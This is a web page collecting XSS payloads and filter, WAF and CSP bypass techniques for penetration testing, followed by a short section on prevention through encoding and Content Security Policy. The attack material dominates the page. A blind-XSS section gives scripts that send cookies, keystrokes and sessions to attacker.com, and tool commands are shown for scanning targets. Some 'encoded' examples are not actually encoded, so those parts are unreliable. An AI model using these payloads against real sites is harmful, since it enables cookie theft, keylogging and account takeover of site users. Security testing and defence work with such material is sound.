XSS Payloads
Comprehensive collection of Cross-Site Scripting (XSS) payloads and bypass techniques.
Basic XSS Payloads
Simple Alert
<script>alert('XSS')</script>
<script>alert(1)</script>
<script>alert(document.domain)</script>
<script>alert(document.cookie)</script>
Image Tag
<img src=x onerror=alert('XSS')>
<img src="javascript:alert('XSS')">
<img src=x onerror=alert(1)>
<img src=x onerror=alert(document.cookie)>
Input Tag
<input onfocus=alert('XSS') autofocus>
<input onmouseover=alert('XSS')>
<input onfocus=alert(1) autofocus>
<input onblur=alert(1) autofocus><input autofocus>
Event Handlers
Mouse Events
<div onmouseover=alert('XSS')>Hover me</div>
<div onmouseenter=alert('XSS')>Enter me</div>
<div onmouseleave=alert('XSS')>Leave me</div>
<div onmousedown=alert('XSS')>Click me</div>
<div onmouseup=alert('XSS')>Release me</div>
<div onclick=alert('XSS')>Click me</div>
<div ondblclick=alert('XSS')>Double click me</div>
Keyboard Events
<input onkeydown=alert('XSS')>
<input onkeyup=alert('XSS')>
<input onkeypress=alert('XSS')>
<input onkeydown=alert(1)>
<input onkeyup=alert(1)>
<input onkeypress=alert(1)>
Form Events
<form onsubmit=alert('XSS')>
<input onchange=alert('XSS')>
<input oninput=alert('XSS')>
<input oninvalid=alert('XSS')>
<input onreset=alert('XSS')>
<input onsearch=alert('XSS')>
Window Events
<body onload=alert('XSS')>
<body onunload=alert('XSS')>
<body onbeforeunload=alert('XSS')>
<body onresize=alert('XSS')>
<body onscroll=alert('XSS')>
<body onfocus=alert('XSS')>
<body onblur=alert('XSS')>
Filter Bypass Techniques
Case Variation
<SCRIPT>alert('XSS')</SCRIPT>
<ScRiPt>alert('XSS')</ScRiPt>
<script>alert('XSS')</script>
Encoding Bypass
<!-- URL Encoding -->
%3Cscript%3Ealert('XSS')%3C/script%3E
%3Cimg%20src=x%20onerror=alert('XSS')%3E
<!-- HTML Entities -->
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<!-- Hex Encoding -->
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<!-- Unicode -->
\u003cscript\u003ealert('XSS')\u003c/script\u003e
Quote Bypass
<!-- Without quotes -->
<img src=x onerror=alert('XSS')>
<img src=x onerror=alert("XSS")>
<img src=x onerror=alert(`XSS`)>
<img src=x onerror=alert(XSS)>
<!-- With different quote types -->
<img src=x onerror=alert('XSS')>
<img src=x onerror=alert("XSS")>
<img src=x onerror=alert(`XSS`)>
Space Bypass
<!-- Tab -->
<img src=x onerror=alert('XSS')>
<!-- Newline -->
<img
src=x
onerror=alert('XSS')>
<!-- Carriage return -->
<img
src=x
onerror=alert('XSS')>
<!-- Form feed -->
<img
src=x
onerror=alert('XSS')>
Comment Bypass
<!-- HTML Comments -->
<img src=x onerror=alert('XSS')><!--
<img src=x onerror=alert('XSS')>-->
<!-- JavaScript Comments -->
<script>/*comment*/alert('XSS')</script>
<script>//comment
alert('XSS')</script>
Advanced Bypass Techniques
WAF Bypass
<!-- OWASP ModSecurity -->
<svg onload=alert('XSS')>
<iframe onload=alert('XSS')>
<object onload=alert('XSS')>
<embed onload=alert('XSS')>
<!-- Cloudflare -->
<img src=x onerror=alert('XSS')>
CSP Bypass
<!-- Nonce bypass -->
<script nonce="random">alert('XSS')</script>
<!-- Hash bypass -->
<script>alert('XSS')</script>
<!-- Source bypass -->
<script src="data:text/javascript,alert('XSS')"></script>
<script src="javascript:alert('XSS')"></script>
DOM-based XSS
// URL Fragment
#<script>alert('XSS')</script>
#<img src=x onerror=alert('XSS')>
// Hash change
window.location.hash = "<script>alert('XSS')</script>";
// Document write
document.write('<script>alert("XSS")</script>');
// InnerHTML
element.innerHTML = '<script>alert("XSS")</script>';
// Eval
eval('alert("XSS")');
Stored XSS Payloads
Profile Fields
<!-- Name field -->
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<!-- Bio field -->
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<!-- Comment field -->
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
File Upload
<!-- Image file -->
<img src=x onerror=alert('XSS')>
<!-- SVG file -->
<svg onload=alert('XSS')>
<!-- HTML file -->
<script>alert('XSS')</script>
Reflected XSS Payloads
URL Parameters
<!-- GET parameter -->
?search=<script>alert('XSS')</script>
?search=<img src=x onerror=alert('XSS')>
<!-- POST parameter -->
username=<script>alert('XSS')</script>
password=<img src=x onerror=alert('XSS')>
Headers
<!-- User-Agent -->
User-Agent: <script>alert('XSS')</script>
<!-- Referer -->
Referer: <script>alert('XSS')</script>
<!-- X-Forwarded-For -->
X-Forwarded-For: <script>alert('XSS')</script>
Blind XSS Payloads
Data Exfiltration
<!-- Basic exfiltration -->
<script>
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://attacker.com/steal?data=' + document.cookie);
xhr.send();
</script>
<!-- Image exfiltration -->
<img src="http://attacker.com/steal?data=document.cookie">
<!-- Form exfiltration -->
<form action="http://attacker.com/steal" method="post">
<input type="hidden" name="data" value="document.cookie">
</form>
Keylogger
<script>
document.addEventListener('keypress', function(e) {
    var xhr = new XMLHttpRequest();
    xhr.open('GET', 'http://attacker.com/keylog?key=' + e.key);
    xhr.send();
});
</script>
Session Hijacking
<script>
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://attacker.com/session?cookie=' + document.cookie);
xhr.send();
</script>
Mobile XSS Payloads
Touch Events
<div ontouchstart=alert('XSS')>Touch me</div>
<div ontouchend=alert('XSS')>Touch me</div>
<div ontouchmove=alert('XSS')>Touch me</div>
<div ontouchcancel=alert('XSS')>Touch me</div>
Orientation Events
<div onorientationchange=alert('XSS')>Rotate me</div>
<div onresize=alert('XSS')>Resize me</div>
Testing Tools
XSSer
# Basic scan
xsser --url="http://target.com/page.php?search=test"
# With payloads
xsser --url="http://target.com/page.php?search=test" --payload="<script>alert('XSS')</script>"
# With encoding
xsser --url="http://target.com/page.php?search=test" --encode
XSStrike
# Basic scan
python3 xsstrike.py -u "http://target.com/page.php?search=test"
# With crawling
python3 xsstrike.py -u "http://target.com/page.php?search=test" --crawl
# With blind XSS
python3 xsstrike.py -u "http://target.com/page.php?search=test" --blind
Custom Script
import requests

def test_xss(url, param, payload):
    # Submit the payload and flag responses that reflect it back unencoded.
    # Reflection only marks a candidate; it still has to be confirmed in a browser.
    data = {param: payload}
    response = requests.post(url, data=data)
    if payload in response.text or "alert" in response.text.lower():
        print(f"Possible XSS (payload reflected): {payload}")

# Test payloads
payloads = [
    "<script>alert('XSS')</script>",
    "<img src=x onerror=alert('XSS')>",
    "<svg onload=alert('XSS')>",
    "<iframe onload=alert('XSS')>"
]
for payload in payloads:
    test_xss("http://target.com/search.php", "query", payload)
Prevention and Mitigation
Input Validation
# Whitelist validation
import re

def validate_input(input_str):
    # Allow only alphanumeric characters, whitespace and basic punctuation;
    # fullmatch anchors the whole string, so nothing can trail the match
    pattern = r'[a-zA-Z0-9\s.,!?]+'
    return re.fullmatch(pattern, input_str) is not None
Output Encoding
import html

def encode_output(input_str):
    # Escape &, <, >, " and ' so untrusted text is inert in HTML body text
    # and in quoted attribute values (quote=True is the default)
    return html.escape(input_str)
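html.escape() is only correct for the HTML body and attribute contexts; a value echoed inside a <script> block needs JavaScript-string encoding instead. The following is an added example, not code from the original page: it runs a constructed sample of the payloads listed above through context-aware encoding and then parses the result the way a browser would to confirm no new tag or on* handler appeared. The template, PAYLOADS and function names are constructed.

```python
# Added example (not from the original page); template, names and PAYLOADS
# are constructed for this demonstration.
import html
import json
from html.parser import HTMLParser

# Constructed sample drawn from the payload lists above
PAYLOADS = [
    "<script>alert('XSS')</script>",
    "<img src=x onerror=alert('XSS')>",
    '" onfocus=alert(1) autofocus="',
    "</script><script>alert(document.cookie)</script>",
]

def escape_html(value):
    """HTML body text and double-quoted attribute values."""
    return html.escape(value, quote=True)

def escape_js_string(value):
    """A value embedded as a JavaScript string literal inside <script>.
    json.dumps() alone leaves </script> intact, which would end the block."""
    encoded = json.dumps(value)
    for ch, esc in (("<", r"\u003c"), (">", r"\u003e"), ("&", r"\u0026")):
        encoded = encoded.replace(ch, esc)
    return encoded

def render_results(search):
    """Echo the search term in body, attribute and script contexts."""
    return (f"<p>Results for {escape_html(search)}</p>\n"
            f'<input type="text" value="{escape_html(search)}">\n'
            f"<script>var lastQuery = {escape_js_string(search)};</script>\n")

class TagCollector(HTMLParser):
    """Records every tag and attribute name a browser would see."""
    def __init__(self):
        super().__init__()
        self.tags, self.attrs = [], []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.attrs.extend(name for name, _ in attrs)

def is_inert(page):
    """True when only the template's own tags exist and no on* handler appeared."""
    collector = TagCollector()
    collector.feed(page)
    return (collector.tags == ["p", "input", "script"]
            and not any(a.startswith("on") for a in collector.attrs))
```

Replacing escape_js_string() with json.dumps() alone lets the fourth payload close the script block early, which is the case html.escape() by itself cannot cover.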
Content Security Policy
<!-- Strict CSP: no 'unsafe-inline', so injected inline scripts and on* handlers are blocked -->
<meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'self';">
<!-- Nonce-based CSP: 'random' is a placeholder; the nonce must be unguessable and generated fresh for every response -->
<meta http-equiv="Content-Security-Policy" content="script-src 'self' 'nonce-random'">
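To see what the two policies above actually permit, here is a small policy evaluator added as an example (not code from the original page). It handles 'self', 'unsafe-inline', nonce sources and scheme/origin sources only; hashes and 'strict-dynamic' are out of scope, and PAGE_ORIGIN, WEAK and STRICT are constructed values.

```python
# Added example (not from the original page): simplified CSP script-src
# evaluation; PAGE_ORIGIN, WEAK and STRICT are constructed for this demo.
import secrets
from urllib.parse import urlsplit

PAGE_ORIGIN = "https://app.example"  # constructed origin of the protected page

def parse_csp(policy):
    """Map each directive name to its list of source expressions."""
    directives = {}
    for part in policy.split(";"):
        tokens = part.split()
        if tokens:
            directives[tokens[0].lower()] = tokens[1:]
    return directives

def script_sources(policy):
    """script-src governs scripts; default-src is the fallback when it is absent."""
    d = parse_csp(policy)
    return d.get("script-src", d.get("default-src", []))

def inline_script_allowed(policy, nonce=None):
    """An injected <script> block or on* handler (handlers can never carry a nonce)."""
    sources = script_sources(policy)
    nonces = {s[len("'nonce-"):-1] for s in sources if s.startswith("'nonce-")}
    hashes = [s for s in sources if s.startswith(("'sha256-", "'sha384-", "'sha512-"))]
    if nonce is not None and nonce in nonces:
        return True
    # Browsers ignore 'unsafe-inline' as soon as any nonce or hash source is present
    return "'unsafe-inline'" in sources and not nonces and not hashes

def external_script_allowed(policy, src):
    """<script src=...>: 'self' matches the page origin only; data: needs a scheme source."""
    sources = script_sources(policy)
    parts = urlsplit(src)
    origin = f"{parts.scheme}://{parts.netloc}" if parts.netloc else None
    if "'self'" in sources and origin == PAGE_ORIGIN:
        return True
    return any(s == f"{parts.scheme}:" or s == origin for s in sources)

def fresh_nonce():
    """Per-response, unguessable nonce; a fixed value like 'random' can be replayed."""
    return secrets.token_urlsafe(16)

WEAK = "default-src 'self'; script-src 'self' 'unsafe-inline';"
STRICT = "script-src 'self' 'nonce-{}'"  # format with fresh_nonce() per response
```

Under WEAK every inline payload on this page runs; under STRICT only a script carrying the current response's nonce does, and the data: and javascript: src forms from the CSP Bypass section are refused because 'self' never matches them.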
Testing Checklist
- Test all input fields
- Test with different HTTP methods
- Test with different content types
- Test with different encodings
- Test with different quote types
- Test with different event handlers
- Test with different tag types
- Test with different bypass techniques
- Test with different WAF bypasses
- Test with different CSP bypasses